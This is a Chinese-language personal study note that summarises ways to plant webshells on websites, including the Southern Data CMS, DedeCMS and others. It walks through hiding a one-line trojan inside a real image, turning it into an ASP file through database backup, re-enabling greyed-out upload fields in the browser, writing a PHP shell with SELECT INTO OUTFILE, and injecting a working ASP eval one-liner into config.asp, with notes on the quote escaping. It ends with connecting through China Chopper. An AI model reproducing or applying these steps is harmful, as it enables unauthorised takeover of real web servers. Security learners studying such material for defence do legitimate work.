获取webshell总结

                                                                                                                          8月6号

1.CMS获取Webshell

方法：通过百度搜索引擎搜索cms网站程序名称

如：phpcms拿webshell，discuz获取webshell（通过一些模板，填ip地址的地方抓包改包，上传图片木马），phpwind拿webshell（用户等级管理插一句话，脏话过滤插一句话，模板插一句话），WordPress拿后台webshell

2.非CMS获取webshell

1）数据库备份获取webshell

例子：

南方数据企业网站系统，首先在网站后台找，看有没有数据库备份，如果有那么你就来备份，就是你把一句话插入到图片里面，再把图片备份成asp，php（看他网站是用什么写的，扩展名）。

当然还需要有后台文件上传的地方，我们要注意下（可能网站会限制扩展名,所以你要修改扩展名，比如.txt改为.jpg）,并且找到文件上传的路径，用火狐的插件firebug查看网络元素，如下图：

这里其实是没有上传成功，是因为网站源代码做了检测内容，就是说你改个扩展名，虽然满足上传条件，但是内容被检测出来了（看是不是真的有图片格式）。

那么他怎么判断的呢？我们看下正常图片和不正常图片，正常图片是由一个文件头的，代表是图片文件，不正常的图片就没有。所以！我们需要伪造图片格式，怎么做呢？

我们把真正的图片和我们的一句话木马图片合并（可以使用edjpgcom.exe，把真正的图片拖到工具，然后插上一句话或者各种大马，就生成了另一个图片，图片正常显示，但是图片中包含木马，我没试过直接把一句话复制到真正的图片中过，但是好像别人成功过，然后linux里是可以直接合并两个文件的），这个时候我们上传：

有的时候，可能在

这两个地方是灰色的或是上传按钮有问题的时候，就是你上传不了，那么你可以右键->使用firebug审查元素，你可以看到框架

当我们点击提交时，我们会将文件上传到”,,/upload_other.asp”，我们就可以通过这个路径上传文件啦！

我们来到数据库备份，将数据库路径改为我们图片所在目录”../UploadFiles/20164232231339933.jpg”(不过，有的网站这个地方不可编辑，因为需要FSO权限).........这种情况下,我们可以通过firebug在html框架里面修改value值

此时我们成功备份，访问我们的shell：

2）抓包上传获取webshell（在文件上传漏洞，iis中间件漏洞，解析漏洞，JavaScript突破...中会介绍，暂时没记录）

使用burp抓包。明小子也可以用（综合上传模块，不过不怎么用了），还是使用burp吧

3）sql命令获取webshell（用Select '' into outfile 'c:/wwwtest/eval.php'）

在这个dedecms中有一个生sql命令行工具模块

注：c:/wwwtest/eval.php呢，是你在网站的根目录常见一个名为eval的php文件（前提是你知道了网站目录路径，这个目录根据不同环境当然不同）

4）模板修改获取webshell

5）插入一句话获取webshell

插一句话需要注意的地方，在这个南方数据企业网站管理系统里面，你需要知道它的网站配置文件在INC目录下的config.asp文件中的（你可以去网上下载这些公开的文件，像我很简单的那个织梦，又或者是这个，down下来看看），如果这些配置文件都是写入到asp里面的，那么我们的一句话也是可以写入进去的，一保存，就写入配置文件了。

Asp一句话：

<%eval request("value")%>

但是我们这样写进去，这个页面就崩溃了。我们需要写成”%><%eval request("value")%><%’

那我们为什么要写成写成这种形式才能起到作用呢：”%><%eval request("value")%><%’

其实<%和%>是asp文件的开端和结束标志

如果我们要在配置文件的这里：const SiteName=”南方数据企业管理系统”            ‘网站名称

插入一句话木马，我们首先要闭合南方二字前的”和最开始的<%，所以我们要在一句话前面加上”%>

那么后面的<%’呢？            <%是闭合最后面的%>结束标志，’单引号是为了闭合网站名称的单引号，这样语法就不会错了！！！如图：

细心一点会发现我们的单引号之间不是有个”双引号么，不会报错么？因为这个被包含在一对闭合的单引号之间，所以不会出问题，你在后台代码去掉也没问题，那我们不去掉是因为，你在前端这样写一句话木马，是做不到去掉的，所以就让他这样放着吧

用菜刀连接，把地址写上“http：//网址/inc/config.asp”,密码就是那个chopper

6）修改上传类型获取webshell

参考文章：gatarwd.iteye.com/blog/542376

https://www.webshell.ren/post-121.html

3.其他获取webshell方法（中间件：phpmyadmin，tomcat，weblogic..）

1）PhpMyadmin（管理数据库的软件）获取webshell

2）Tomcat获取webshell

3）Weblogic获取webshell

4）JBoss获取webshell